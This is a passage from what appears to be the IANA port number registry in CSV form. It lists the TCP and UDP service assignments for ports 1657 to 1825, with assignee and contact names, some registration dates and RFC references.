fujitsu-mmpdc,1657,udp,fujitsu-mmpdc,[Katsumi_Oomuro],[Katsumi_Oomuro],,,,,, sixnetudr,1658,tcp,sixnetudr,[Red_Lion_Controls],[Denis_Aull],,2014-05-21,,,, sixnetudr,1658,udp,sixnetudr,[Red_Lion_Controls],[Denis_Aull],,2014-05-21,,,, sg-lm,1659,tcp,Silicon Grail License Manager,[William_R_Bishop],[William_R_Bishop],,,,,, sg-lm,1659,udp,Silicon Grail License Manager,[William_R_Bishop],[William_R_Bishop],,,,,, skip-mc-gikreq,1660,tcp,skip-mc-gikreq,[Tom_Markson],[Tom_Markson],,,,,, skip-mc-gikreq,1660,udp,skip-mc-gikreq,[Tom_Markson],[Tom_Markson],,,,,, netview-aix-1,1661,tcp,netview-aix-1,,,,,,,, netview-aix-1,1661,udp,netview-aix-1,,,,,,,, netview-aix-2,1662,tcp,netview-aix-2,,,,,,,, netview-aix-2,1662,udp,netview-aix-2,,,,,,,, netview-aix-3,1663,tcp,netview-aix-3,,,,,,,, netview-aix-3,1663,udp,netview-aix-3,,,,,,,, netview-aix-4,1664,tcp,netview-aix-4,,,,,,,, netview-aix-4,1664,udp,netview-aix-4,,,,,,,, netview-aix-5,1665,tcp,netview-aix-5,,,,,,,, netview-aix-5,1665,udp,netview-aix-5,,,,,,,, netview-aix-6,1666,tcp,netview-aix-6,,,,,,,, netview-aix-6,1666,udp,netview-aix-6,,,,,,,, netview-aix-7,1667,tcp,netview-aix-7,,,,,,,, netview-aix-7,1667,udp,netview-aix-7,,,,,,,, netview-aix-8,1668,tcp,netview-aix-8,,,,,,,, netview-aix-8,1668,udp,netview-aix-8,,,,,,,, netview-aix-9,1669,tcp,netview-aix-9,,,,,,,, netview-aix-9,1669,udp,netview-aix-9,,,,,,,, netview-aix-10,1670,tcp,netview-aix-10,,,,,,,, netview-aix-10,1670,udp,netview-aix-10,,,,,,,, netview-aix-11,1671,tcp,netview-aix-11,,,,,,,, netview-aix-11,1671,udp,netview-aix-11,,,,,,,, netview-aix-12,1672,tcp,netview-aix-12,[Martha_Crisson],[Martha_Crisson],,,,,, netview-aix-12,1672,udp,netview-aix-12,[Martha_Crisson],[Martha_Crisson],,,,,, proshare-mc-1,1673,tcp,Intel Proshare Multicast,,,,,,,, proshare-mc-1,1673,udp,Intel Proshare Multicast,,,,,,,, proshare-mc-2,1674,tcp,Intel Proshare Multicast,[Mark_Lewis],[Mark_Lewis],,,,,, proshare-mc-2,1674,udp,Intel Proshare Multicast,[Mark_Lewis],[Mark_Lewis],,,,,, pdp,1675,tcp,Pacific Data Products,[Gary_Morton],[Gary_Morton],,,,,, pdp,1675,udp,Pacific Data Products,[Gary_Morton],[Gary_Morton],,,,,, netcomm1,1676,tcp,netcomm1,,,,,,,, netcomm2,1676,udp,netcomm2,[Bulent_Kasman],[Bulent_Kasman],,,,,, groupwise,1677,tcp,groupwise,[Brent_Bradshaw],[Brent_Bradshaw],,,,,, groupwise,1677,udp,groupwise,[Brent_Bradshaw],[Brent_Bradshaw],,,,,, prolink,1678,tcp,prolink,[Brian_Abramson],[Brian_Abramson],,,,,, prolink,1678,udp,prolink,[Brian_Abramson],[Brian_Abramson],,,,,, darcorp-lm,1679,tcp,darcorp-lm,[DARcorp],[DARcorp],,,,,, darcorp-lm,1679,udp,darcorp-lm,[DARcorp],[DARcorp],,,,,, microcom-sbp,1680,tcp,microcom-sbp,[Boris_B_Maiden],[Boris_B_Maiden],,,,,, microcom-sbp,1680,udp,microcom-sbp,[Boris_B_Maiden],[Boris_B_Maiden],,,,,, sd-elmd,1681,tcp,sd-elmd,[Bryan_Otey],[Bryan_Otey],,,,,, sd-elmd,1681,udp,sd-elmd,[Bryan_Otey],[Bryan_Otey],,,,,, lanyon-lantern,1682,tcp,lanyon-lantern,[Robin_Lewis],[Robin_Lewis],,,,,, lanyon-lantern,1682,udp,lanyon-lantern,[Robin_Lewis],[Robin_Lewis],,,,,, ncpm-hip,1683,tcp,ncpm-hip,[Ken_Hearn],[Ken_Hearn],,,,,, ncpm-hip,1683,udp,ncpm-hip,[Ken_Hearn],[Ken_Hearn],,,,,, snaresecure,1684,tcp,SnareSecure,[Marty_Batchelder],[Marty_Batchelder],,,,,, snaresecure,1684,udp,SnareSecure,[Marty_Batchelder],[Marty_Batchelder],,,,,, n2nremote,1685,tcp,n2nremote,[Kin_Chan_2],[Kin_Chan_2],,,,,, n2nremote,1685,udp,n2nremote,[Kin_Chan_2],[Kin_Chan_2],,,,,, cvmon,1686,tcp,cvmon,[Carol_Ann_Krug],[Carol_Ann_Krug],,,,,, cvmon,1686,udp,cvmon,[Carol_Ann_Krug],[Carol_Ann_Krug],,,,,, nsjtp-ctrl,1687,tcp,nsjtp-ctrl,,,,,,,, nsjtp-ctrl,1687,udp,nsjtp-ctrl,,,,,,,, nsjtp-data,1688,tcp,nsjtp-data,[Orazio_Granato],[Orazio_Granato],,,,,, nsjtp-data,1688,udp,nsjtp-data,[Orazio_Granato],[Orazio_Granato],,,,,, firefox,1689,tcp,firefox,[Mark_S_Edwards],[Mark_S_Edwards],,,,,, firefox,1689,udp,firefox,[Mark_S_Edwards],[Mark_S_Edwards],,,,,, ng-umds,1690,tcp,ng-umds,[Louis_E_Simard],[Louis_E_Simard],,,,,, ng-umds,1690,udp,ng-umds,[Louis_E_Simard],[Louis_E_Simard],,,,,, empire-empuma,1691,tcp,empire-empuma,[Bobby_Krupczak],[Bobby_Krupczak],,,,,, empire-empuma,1691,udp,empire-empuma,[Bobby_Krupczak],[Bobby_Krupczak],,,,,, sstsys-lm,1692,tcp,sstsys-lm,[Yih_Wu_Wang],[Yih_Wu_Wang],,,,,, sstsys-lm,1692,udp,sstsys-lm,[Yih_Wu_Wang],[Yih_Wu_Wang],,,,,, rrirtr,1693,tcp,rrirtr,,,,,,,, rrirtr,1693,udp,rrirtr,,,,,,,, rrimwm,1694,tcp,rrimwm,,,,,,,, rrimwm,1694,udp,rrimwm,,,,,,,, rrilwm,1695,tcp,rrilwm,,,,,,,, rrilwm,1695,udp,rrilwm,,,,,,,, rrifmm,1696,tcp,rrifmm,,,,,,,, rrifmm,1696,udp,rrifmm,,,,,,,, rrisat,1697,tcp,rrisat,[Allen_Briggs],[Allen_Briggs],,,,,, rrisat,1697,udp,rrisat,[Allen_Briggs],[Allen_Briggs],,,,,, rsvp-encap-1,1698,tcp,RSVP-ENCAPSULATION-1,,,,,,,, rsvp-encap-1,1698,udp,RSVP-ENCAPSULATION-1,,,,,,,, rsvp-encap-2,1699,tcp,RSVP-ENCAPSULATION-2,[Bob_Braden_2],[Bob_Braden_2],,,,,, rsvp-encap-2,1699,udp,RSVP-ENCAPSULATION-2,[Bob_Braden_2],[Bob_Braden_2],,,,,, mps-raft,1700,tcp,mps-raft,[Jason_Leupen],[Jason_Leupen],,,,,, mps-raft,1700,udp,mps-raft,[Jason_Leupen],[Jason_Leupen],,,,,, l2f,1701,tcp,l2f,,,,,,,, l2f,1701,udp,l2f,,,,,,,, l2tp,1701,tcp,l2tp,[Andy_Valencia],[Andy_Valencia],,,,,, l2tp,1701,udp,l2tp,[Andy_Valencia],[Andy_Valencia],,,,,, deskshare,1702,tcp,deskshare,[Sarah_Thompson],[Sarah_Thompson],,,,,, deskshare,1702,udp,deskshare,[Sarah_Thompson],[Sarah_Thompson],,,,,, hb-engine,1703,tcp,hb-engine,[Charles_C_L_Chou],[Charles_C_L_Chou],,,,,, hb-engine,1703,udp,hb-engine,[Charles_C_L_Chou],[Charles_C_L_Chou],,,,,, bcs-broker,1704,tcp,bcs-broker,[Andy_Warner],[Andy_Warner],,,,,, bcs-broker,1704,udp,bcs-broker,[Andy_Warner],[Andy_Warner],,,,,, slingshot,1705,tcp,slingshot,[Paul_Groarke],[Paul_Groarke],,,,,, slingshot,1705,udp,slingshot,[Paul_Groarke],[Paul_Groarke],,,,,, jetform,1706,tcp,jetform,[gdeinsta],[gdeinsta],,,,,, jetform,1706,udp,jetform,[gdeinsta],[gdeinsta],,,,,, vdmplay,1707,tcp,vdmplay,[David_Thielen],[David_Thielen],,,,,, vdmplay,1707,udp,vdmplay,[David_Thielen],[David_Thielen],,,,,, gat-lmd,1708,tcp,gat-lmd,[Igor_Zaoutine],[Igor_Zaoutine],,,,,, gat-lmd,1708,udp,gat-lmd,[Igor_Zaoutine],[Igor_Zaoutine],,,,,, centra,1709,tcp,centra,[Drew_Wolff],[Drew_Wolff],,,,,, centra,1709,udp,centra,[Drew_Wolff],[Drew_Wolff],,,,,, impera,1710,tcp,impera,[Stepehen_Campbell],[Stepehen_Campbell],,,,,, impera,1710,udp,impera,[Stepehen_Campbell],[Stepehen_Campbell],,,,,, pptconference,1711,tcp,pptconference,[John_Tafoya],[John_Tafoya],,,,,, pptconference,1711,udp,pptconference,[John_Tafoya],[John_Tafoya],,,,,, registrar,1712,tcp,resource monitoring service,[Ron_Lawson],[Ron_Lawson],,,,,, registrar,1712,udp,resource monitoring service,[Ron_Lawson],[Ron_Lawson],,,,,, conferencetalk,1713,tcp,ConferenceTalk,[George_Kajos],[George_Kajos],,,,,, conferencetalk,1713,udp,ConferenceTalk,[George_Kajos],[George_Kajos],,,,,, sesi-lm,1714,tcp,sesi-lm,,,,,,,, sesi-lm,1714,udp,sesi-lm,,,,,,,, houdini-lm,1715,tcp,houdini-lm,[Paul_Breslin],[Paul_Breslin],,,,,, houdini-lm,1715,udp,houdini-lm,[Paul_Breslin],[Paul_Breslin],,,,,, xmsg,1716,tcp,xmsg,[Mark_E_Fogle],[Mark_E_Fogle],,,,,, xmsg,1716,udp,xmsg,[Mark_E_Fogle],[Mark_E_Fogle],,,,,, fj-hdnet,1717,tcp,fj-hdnet,[Manabu_Makino],[Manabu_Makino],,,,,, fj-hdnet,1717,udp,fj-hdnet,[Manabu_Makino],[Manabu_Makino],,,,,, h323gatedisc,1718,tcp,H.323 Multicast Gatekeeper Discover,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, h323gatedisc,1718,udp,H.323 Multicast Gatekeeper Discover,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, h323gatestat,1719,tcp,H.323 Unicast Gatekeeper Signaling,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, h323gatestat,1719,udp,H.323 Unicast Gatekeeper Signaling,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, h323hostcall,1720,tcp,H.323 Call Control Signalling,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, h323hostcall,1720,udp,H.323 Call Control Signalling,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, caicci,1721,tcp,caicci,[Sylvia_Scheuren],[Sylvia_Scheuren],,,,,, caicci,1721,udp,caicci,[Sylvia_Scheuren],[Sylvia_Scheuren],,,,,, hks-lm,1722,tcp,HKS License Manager,[Michael_Wood],[Michael_Wood],,,,,, hks-lm,1722,udp,HKS License Manager,[Michael_Wood],[Michael_Wood],,,,,, pptp,1723,tcp,pptp,[Ken_Crocker],[Ken_Crocker],,,,,, pptp,1723,udp,pptp,[Ken_Crocker],[Ken_Crocker],,,,,, csbphonemaster,1724,tcp,csbphonemaster,[Hans_Peter_Heffels],[Hans_Peter_Heffels],,,,,, csbphonemaster,1724,udp,csbphonemaster,[Hans_Peter_Heffels],[Hans_Peter_Heffels],,,,,, iden-ralp,1725,tcp,iden-ralp,[Chris_Stanaway],[Chris_Stanaway],,,,,, iden-ralp,1725,udp,iden-ralp,[Chris_Stanaway],[Chris_Stanaway],,,,,, iberiagames,1726,tcp,IBERIAGAMES,[Jose_Luis],[Jose_Luis],,,,,, iberiagames,1726,udp,IBERIAGAMES,[Jose_Luis],[Jose_Luis],,,,,, winddx,1727,tcp,winddx,[Bill_Andrews],[Bill_Andrews],,,,,, winddx,1727,udp,winddx,[Bill_Andrews],[Bill_Andrews],,,,,, telindus,1728,tcp,TELINDUS,[Paul_Pyck],[Paul_Pyck],,,,,, telindus,1728,udp,TELINDUS,[Paul_Pyck],[Paul_Pyck],,,,,, citynl,1729,tcp,CityNL License Management,[CityDisc],[CityDisc],,,,,, citynl,1729,udp,CityNL License Management,[CityDisc],[CityDisc],,,,,, roketz,1730,tcp,roketz,[Ahti_Heinla],[Ahti_Heinla],,,,,, roketz,1730,udp,roketz,[Ahti_Heinla],[Ahti_Heinla],,,,,, msiccp,1731,tcp,MSICCP,[Max_Morris],[Max_Morris],,,,,, msiccp,1731,udp,MSICCP,[Max_Morris],[Max_Morris],,,,,, proxim,1732,tcp,proxim,[Srinivas_N_Mogalapa],[Srinivas_N_Mogalapa],,,,,, proxim,1732,udp,proxim,[Srinivas_N_Mogalapa],[Srinivas_N_Mogalapa],,,,,, siipat,1733,tcp,SIMS - SIIPAT Protocol for Alarm Transmission,[Steve_Ryckman],[Steve_Ryckman],,,,,, siipat,1733,udp,SIMS - SIIPAT Protocol for Alarm Transmission,[Steve_Ryckman],[Steve_Ryckman],,,,,, cambertx-lm,1734,tcp,Camber Corporation License Management,[Jeannie_Burleson],[Jeannie_Burleson],,,,,, cambertx-lm,1734,udp,Camber Corporation License Management,[Jeannie_Burleson],[Jeannie_Burleson],,,,,, privatechat,1735,tcp,PrivateChat,[Louis_E_Simard],[Louis_E_Simard],,,,,, privatechat,1735,udp,PrivateChat,[Louis_E_Simard],[Louis_E_Simard],,,,,, street-stream,1736,tcp,street-stream,[Glenn_Levitt],[Glenn_Levitt],,,,,, street-stream,1736,udp,street-stream,[Glenn_Levitt],[Glenn_Levitt],,,,,, ultimad,1737,tcp,ultimad,[Michael_Lanzetta],[Michael_Lanzetta],,,,,, ultimad,1737,udp,ultimad,[Michael_Lanzetta],[Michael_Lanzetta],,,,,, gamegen1,1738,tcp,GameGen1,[Glen_Pearson],[Glen_Pearson],,,,,, gamegen1,1738,udp,GameGen1,[Glen_Pearson],[Glen_Pearson],,,,,, webaccess,1739,tcp,webaccess,[Christian_Saether],[Christian_Saether],,,,,, webaccess,1739,udp,webaccess,[Christian_Saether],[Christian_Saether],,,,,, encore,1740,tcp,encore,[Stuart_Button],[Stuart_Button],,,,,, encore,1740,udp,encore,[Stuart_Button],[Stuart_Button],,,,,, cisco-net-mgmt,1741,tcp,cisco-net-mgmt,[John_McCormack],[John_McCormack],,,,,, cisco-net-mgmt,1741,udp,cisco-net-mgmt,[John_McCormack],[John_McCormack],,,,,, 3Com-nsd,1742,tcp,3Com-nsd,[Nitza_Steinberg],[Nitza_Steinberg],,,,,, 3Com-nsd,1742,udp,3Com-nsd,[Nitza_Steinberg],[Nitza_Steinberg],,,,,, cinegrfx-lm,1743,tcp,Cinema Graphics License Manager,[Rodney_Iwashina],[Rodney_Iwashina],,,,,, cinegrfx-lm,1743,udp,Cinema Graphics License Manager,[Rodney_Iwashina],[Rodney_Iwashina],,,,,, ncpm-ft,1744,tcp,ncpm-ft,[Ken_Hearn],[Ken_Hearn],,,,,, ncpm-ft,1744,udp,ncpm-ft,[Ken_Hearn],[Ken_Hearn],,,,,, remote-winsock,1745,tcp,remote-winsock,[Avi_Nathan],[Avi_Nathan],,,,,, remote-winsock,1745,udp,remote-winsock,[Avi_Nathan],[Avi_Nathan],,,,,, ftrapid-1,1746,tcp,ftrapid-1,,,,,,,, ftrapid-1,1746,udp,ftrapid-1,,,,,,,, ftrapid-2,1747,tcp,ftrapid-2,[Richard_J_Williams],[Richard_J_Williams],,,,,, ftrapid-2,1747,udp,ftrapid-2,[Richard_J_Williams],[Richard_J_Williams],,,,,, oracle-em1,1748,tcp,oracle-em1,[Bob_Purvy],[Bob_Purvy],,,,,, oracle-em1,1748,udp,oracle-em1,[Bob_Purvy],[Bob_Purvy],,,,,, aspen-services,1749,tcp,aspen-services,[Mark_B_Hurst],[Mark_B_Hurst],,,,,, aspen-services,1749,udp,aspen-services,[Mark_B_Hurst],[Mark_B_Hurst],,,,,, sslp,1750,tcp,Simple Socket Library's PortMaster,[Dr_Charles_E_Campb],[Dr_Charles_E_Campb],,,,,, sslp,1750,udp,Simple Socket Library's PortMaster,[Dr_Charles_E_Campb],[Dr_Charles_E_Campb],,,,,, swiftnet,1751,tcp,SwiftNet,[Terry_Lim],[Terry_Lim],,,,,, swiftnet,1751,udp,SwiftNet,[Terry_Lim],[Terry_Lim],,,,,, lofr-lm,1752,tcp,Leap of Faith Research License Manager,,,,,,,, lofr-lm,1752,udp,Leap of Faith Research License Manager,,,,,,,, predatar-comms,1753,tcp,Predatar Comms Service,[Silverstring_Ltd],[Ronnie_De_Giorgio],2011-09-15,,,,, ,1753,udp,Reserved,,,,,,,, oracle-em2,1754,tcp,oracle-em2,[Bob_Purvy],[Bob_Purvy],,,,,, oracle-em2,1754,udp,oracle-em2,[Bob_Purvy],[Bob_Purvy],,,,,, ms-streaming,1755,tcp,ms-streaming,[Bret_O_Rourke],[Bret_O_Rourke],,,,,, ms-streaming,1755,udp,ms-streaming,[Bret_O_Rourke],[Bret_O_Rourke],,,,,, capfast-lmd,1756,tcp,capfast-lmd,[Chuck_Neal],[Chuck_Neal],,,,,, capfast-lmd,1756,udp,capfast-lmd,[Chuck_Neal],[Chuck_Neal],,,,,, cnhrp,1757,tcp,cnhrp,[William_Stoye],[William_Stoye],,,,,, cnhrp,1757,udp,cnhrp,[William_Stoye],[William_Stoye],,,,,, tftp-mcast,1758,tcp,tftp-mcast,[Tom_Emberson],[Tom_Emberson],,,,,, tftp-mcast,1758,udp,tftp-mcast,[Tom_Emberson],[Tom_Emberson],,,,,, spss-lm,1759,tcp,SPSS License Manager,[Tex_Hull],[Tex_Hull],,,,,, spss-lm,1759,udp,SPSS License Manager,[Tex_Hull],[Tex_Hull],,,,,, www-ldap-gw,1760,tcp,www-ldap-gw,[Nick_Emery],[Nick_Emery],,,,,, www-ldap-gw,1760,udp,www-ldap-gw,[Nick_Emery],[Nick_Emery],,,,,, cft-0,1761,tcp,cft-0,[Martine_Marchand],[Martine_Marchand],,,,,, cft-0,1761,udp,cft-0,[Martine_Marchand],[Martine_Marchand],,,,,, cft-1,1762,tcp,cft-1,[Martine_Marchand],[Martine_Marchand],,,,,, cft-1,1762,udp,cft-1,[Martine_Marchand],[Martine_Marchand],,,,,, cft-2,1763,tcp,cft-2,[Martine_Marchand],[Martine_Marchand],,,,,, cft-2,1763,udp,cft-2,[Martine_Marchand],[Martine_Marchand],,,,,, cft-3,1764,tcp,cft-3,[Martine_Marchand],[Martine_Marchand],,,,,, cft-3,1764,udp,cft-3,[Martine_Marchand],[Martine_Marchand],,,,,, cft-4,1765,tcp,cft-4,[Martine_Marchand],[Martine_Marchand],,,,,, cft-4,1765,udp,cft-4,[Martine_Marchand],[Martine_Marchand],,,,,, cft-5,1766,tcp,cft-5,[Martine_Marchand],[Martine_Marchand],,,,,, cft-5,1766,udp,cft-5,[Martine_Marchand],[Martine_Marchand],,,,,, cft-6,1767,tcp,cft-6,[Martine_Marchand],[Martine_Marchand],,,,,, cft-6,1767,udp,cft-6,[Martine_Marchand],[Martine_Marchand],,,,,, cft-7,1768,tcp,cft-7,[Martine_Marchand],[Martine_Marchand],,,,,, cft-7,1768,udp,cft-7,[Martine_Marchand],[Martine_Marchand],,,,,, bmc-net-adm,1769,tcp,bmc-net-adm,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-net-adm,1769,udp,bmc-net-adm,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-net-svc,1770,tcp,bmc-net-svc,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-net-svc,1770,udp,bmc-net-svc,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, vaultbase,1771,tcp,vaultbase,[Jose_A_Sesin],[Jose_A_Sesin],,,,,, vaultbase,1771,udp,vaultbase,[Jose_A_Sesin],[Jose_A_Sesin],,,,,, essweb-gw,1772,tcp,EssWeb Gateway,[Bob_Nattenberg],[Bob_Nattenberg],,,,,, essweb-gw,1772,udp,EssWeb Gateway,[Bob_Nattenberg],[Bob_Nattenberg],,,,,, kmscontrol,1773,tcp,KMSControl,[Roy_Chastain],[Roy_Chastain],,,,,, kmscontrol,1773,udp,KMSControl,[Roy_Chastain],[Roy_Chastain],,,,,, global-dtserv,1774,tcp,global-dtserv,[Nicholas_Davies],[Nicholas_Davies],,,,,, global-dtserv,1774,udp,global-dtserv,[Nicholas_Davies],[Nicholas_Davies],,,,,, vdab,1775,tcp,data interchange between visual processing containers,[MJA_Technology_LLC],[Mark_J._App],2014-04-23,,,,, ,1775,udp,Reserved,,,,,,,, femis,1776,tcp,Federal Emergency Management Information System,[Larry_Gerhardstein],[Larry_Gerhardstein],,,,,, femis,1776,udp,Federal Emergency Management Information System,[Larry_Gerhardstein],[Larry_Gerhardstein],,,,,, powerguardian,1777,tcp,powerguardian,[Charles_Bennett],[Charles_Bennett],2008-08-29,,,,, powerguardian,1777,udp,powerguardian,[Charles_Bennett],[Charles_Bennett],2008-08-29,,,,, prodigy-intrnet,1778,tcp,prodigy-internet,[Bob_Dedrick],[Bob_Dedrick],,,,,, prodigy-intrnet,1778,udp,prodigy-internet,[Bob_Dedrick],[Bob_Dedrick],,,,,, pharmasoft,1779,tcp,pharmasoft,[Ola_Strandberg],[Ola_Strandberg],,,,,, pharmasoft,1779,udp,pharmasoft,[Ola_Strandberg],[Ola_Strandberg],,,,,, dpkeyserv,1780,tcp,dpkeyserv,[Yasunari_Gon_Yamasit],[Yasunari_Gon_Yamasit],,,,,, dpkeyserv,1780,udp,dpkeyserv,[Yasunari_Gon_Yamasit],[Yasunari_Gon_Yamasit],,,,,, answersoft-lm,1781,tcp,answersoft-lm,[James_A_Brewster],[James_A_Brewster],,,,,, answersoft-lm,1781,udp,answersoft-lm,[James_A_Brewster],[James_A_Brewster],,,,,, hp-hcip,1782,tcp,hp-hcip,[Allen_Baker],[Allen_Baker],,,,,, hp-hcip,1782,udp,hp-hcip,[Allen_Baker],[Allen_Baker],,,,,, ,1783,,"Decomissioned Port 04/14/00, ms",[naonao],[naonao],,,,,, finle-lm,1784,tcp,Finle License Manager,[Dongling_Wang],[Dongling_Wang],,,,,, finle-lm,1784,udp,Finle License Manager,[Dongling_Wang],[Dongling_Wang],,,,,, windlm,1785,tcp,Wind River Systems License Manager,[Will_Dere],[Will_Dere],,,,,, windlm,1785,udp,Wind River Systems License Manager,[Will_Dere],[Will_Dere],,,,,, funk-logger,1786,tcp,funk-logger,,,,,,,, funk-logger,1786,udp,funk-logger,,,,,,,, funk-license,1787,tcp,funk-license,[Cimarron_Boozer][Eric_Wilde],[Cimarron_Boozer][Eric_Wilde],,,,,, funk-license,1787,udp,funk-license,[Cimarron_Boozer][Eric_Wilde],[Cimarron_Boozer][Eric_Wilde],,,,,, psmond,1788,tcp,psmond,[Will_Golson],[Will_Golson],,,,,, psmond,1788,udp,psmond,[Will_Golson],[Will_Golson],,,,,, hello,1789,tcp,hello,[D_J_Bernstein_2],[D_J_Bernstein_2],,,,,, hello,1789,udp,hello,[D_J_Bernstein_2],[D_J_Bernstein_2],,,,,, nmsp,1790,tcp,Narrative Media Streaming Protocol,[Paul_Santinelli_Jr],[Paul_Santinelli_Jr],,,,,, nmsp,1790,udp,Narrative Media Streaming Protocol,[Paul_Santinelli_Jr],[Paul_Santinelli_Jr],,,,,, ea1,1791,tcp,EA1,[Kirk_MacLean],[Kirk_MacLean],,,,,, ea1,1791,udp,EA1,[Kirk_MacLean],[Kirk_MacLean],,,,,, ibm-dt-2,1792,tcp,ibm-dt-2,[Sam_Borman],[Sam_Borman],,,,,, ibm-dt-2,1792,udp,ibm-dt-2,[Sam_Borman],[Sam_Borman],,,,,, rsc-robot,1793,tcp,rsc-robot,[Andrew_Jay_Schneider],[Andrew_Jay_Schneider],,,,,, rsc-robot,1793,udp,rsc-robot,[Andrew_Jay_Schneider],[Andrew_Jay_Schneider],,,,,, cera-bcm,1794,tcp,cera-bcm,[Leo_Moesgaard],[Leo_Moesgaard],,,,,, cera-bcm,1794,udp,cera-bcm,[Leo_Moesgaard],[Leo_Moesgaard],,,,,, dpi-proxy,1795,tcp,dpi-proxy,[Charles_Gordon],[Charles_Gordon],,,,,, dpi-proxy,1795,udp,dpi-proxy,[Charles_Gordon],[Charles_Gordon],,,,,, vocaltec-admin,1796,tcp,Vocaltec Server Administration,[Scott_Petrack],[Scott_Petrack],,,,,, vocaltec-admin,1796,udp,Vocaltec Server Administration,[Scott_Petrack],[Scott_Petrack],,,,,, uma,1797,tcp,UMA,[Martin_Kirk],[Martin_Kirk],,,,,, uma,1797,udp,UMA,[Martin_Kirk],[Martin_Kirk],,,,,, etp,1798,tcp,Event Transfer Protocol,[Mike_Wray],[Mike_Wray],,,,,, etp,1798,udp,Event Transfer Protocol,[Mike_Wray],[Mike_Wray],,,,,, netrisk,1799,tcp,NETRISK,[Kevin_Green],[Kevin_Green],,,,,, netrisk,1799,udp,NETRISK,[Kevin_Green],[Kevin_Green],,,,,, ansys-lm,1800,tcp,ANSYS-License manager,[Suzanne_Lorrin_2],[Suzanne_Lorrin_2],,,,,, ansys-lm,1800,udp,ANSYS-License manager,[Suzanne_Lorrin_2],[Suzanne_Lorrin_2],,,,,, msmq,1801,tcp,Microsoft Message Que,[Amnon_Horowitz],[Amnon_Horowitz],,,,,, msmq,1801,udp,Microsoft Message Que,[Amnon_Horowitz],[Amnon_Horowitz],,,,,, concomp1,1802,tcp,ConComp1,[Ed_Vincent],[Ed_Vincent],,,,,, concomp1,1802,udp,ConComp1,[Ed_Vincent],[Ed_Vincent],,,,,, hp-hcip-gwy,1803,tcp,HP-HCIP-GWY,[Allen_Baker],[Allen_Baker],,,,,, hp-hcip-gwy,1803,udp,HP-HCIP-GWY,[Allen_Baker],[Allen_Baker],,,,,, enl,1804,tcp,ENL,[Brian_Olson],[Brian_Olson],,,,,, enl,1804,udp,ENL,[Brian_Olson],[Brian_Olson],,,,,, enl-name,1805,tcp,ENL-Name,[Brian_Olson],[Brian_Olson],,,,,, enl-name,1805,udp,ENL-Name,[Brian_Olson],[Brian_Olson],,,,,, musiconline,1806,tcp,Musiconline,[Craig_Weeks],[Craig_Weeks],,,,,, musiconline,1806,udp,Musiconline,[Craig_Weeks],[Craig_Weeks],,,,,, fhsp,1807,tcp,Fujitsu Hot Standby Protocol,[Eiki_Iwata],[Eiki_Iwata],,,,,, fhsp,1807,udp,Fujitsu Hot Standby Protocol,[Eiki_Iwata],[Eiki_Iwata],,,,,, oracle-vp2,1808,tcp,Oracle-VP2,[Craig_Fowler],[Craig_Fowler],,,,,, oracle-vp2,1808,udp,Oracle-VP2,[Craig_Fowler],[Craig_Fowler],,,,,, oracle-vp1,1809,tcp,Oracle-VP1,[Craig_Fowler],[Craig_Fowler],,,,,, oracle-vp1,1809,udp,Oracle-VP1,[Craig_Fowler],[Craig_Fowler],,,,,, jerand-lm,1810,tcp,Jerand License Manager,[Robert_Monat],[Robert_Monat],,,,,, jerand-lm,1810,udp,Jerand License Manager,[Robert_Monat],[Robert_Monat],,,,,, scientia-sdb,1811,tcp,Scientia-SDB,[SYSTEMS_MANAGER],[SYSTEMS_MANAGER],,,,,, scientia-sdb,1811,udp,Scientia-SDB,[SYSTEMS_MANAGER],[SYSTEMS_MANAGER],,,,,, radius,1812,tcp,RADIUS,,,,,[RFC2865],,, radius,1812,udp,RADIUS,,,,,[RFC2865],,, radius-acct,1813,tcp,RADIUS Accounting,,,,,[RFC2866],,, radius-acct,1813,udp,RADIUS Accounting,,,,,[RFC2866],,, tdp-suite,1814,tcp,TDP Suite,[Rob_Lockhart],[Rob_Lockhart],,,,,, tdp-suite,1814,udp,TDP Suite,[Rob_Lockhart],[Rob_Lockhart],,,,,, mmpft,1815,tcp,MMPFT,[Ralf_Muckenhirn],[Ralf_Muckenhirn],,,,,, mmpft,1815,udp,MMPFT,[Ralf_Muckenhirn],[Ralf_Muckenhirn],,,,,, harp,1816,tcp,HARP,[Bjorn_Chambless],[Bjorn_Chambless],,,,,, harp,1816,udp,HARP,[Bjorn_Chambless],[Bjorn_Chambless],,,,,, rkb-oscs,1817,tcp,RKB-OSCS,[Robert_Kevin_Breton],[Robert_Kevin_Breton],,,,,, rkb-oscs,1817,udp,RKB-OSCS,[Robert_Kevin_Breton],[Robert_Kevin_Breton],,,,,, etftp,1818,tcp,Enhanced Trivial File Transfer Protocol,[William_Polites],[William_Polites],,,,,, etftp,1818,udp,Enhanced Trivial File Transfer Protocol,[William_Polites],[William_Polites],,,,,, plato-lm,1819,tcp,Plato License Manager,[Mark_Morris],[Mark_Morris],,,,,, plato-lm,1819,udp,Plato License Manager,[Mark_Morris],[Mark_Morris],,,,,, mcagent,1820,tcp,mcagent,[Ryoichi_Shinohara],[Ryoichi_Shinohara],,,,,, mcagent,1820,udp,mcagent,[Ryoichi_Shinohara],[Ryoichi_Shinohara],,,,,, donnyworld,1821,tcp,donnyworld,[Don_Oliver],[Don_Oliver],,,,,, donnyworld,1821,udp,donnyworld,[Don_Oliver],[Don_Oliver],,,,,, es-elmd,1822,tcp,es-elmd,[David_Duncan],[David_Duncan],,,,,, es-elmd,1822,udp,es-elmd,[David_Duncan],[David_Duncan],,,,,, unisys-lm,1823,tcp,Unisys Natural Language License Manager,[Raymond_A_Diedrichs],[Raymond_A_Diedrichs],,,,,, unisys-lm,1823,udp,Unisys Natural Language License Manager,[Raymond_A_Diedrichs],[Raymond_A_Diedrichs],,,,,, metrics-pas,1824,tcp,metrics-pas,[Tom_Haapanen],[Tom_Haapanen],,,,,, metrics-pas,1824,udp,metrics-pas,[Tom_Haapanen],[Tom_Haapanen],,,,,, direcpc-video,1825,tcp,DirecPC Video,[Chris_Kerrigan],[Chris_Kerrigan],,,,,, direcpc-video,1825,udp,DirecPC Video,[Chris_Kerrigan],[Chris_Kerrigan],,,,,, 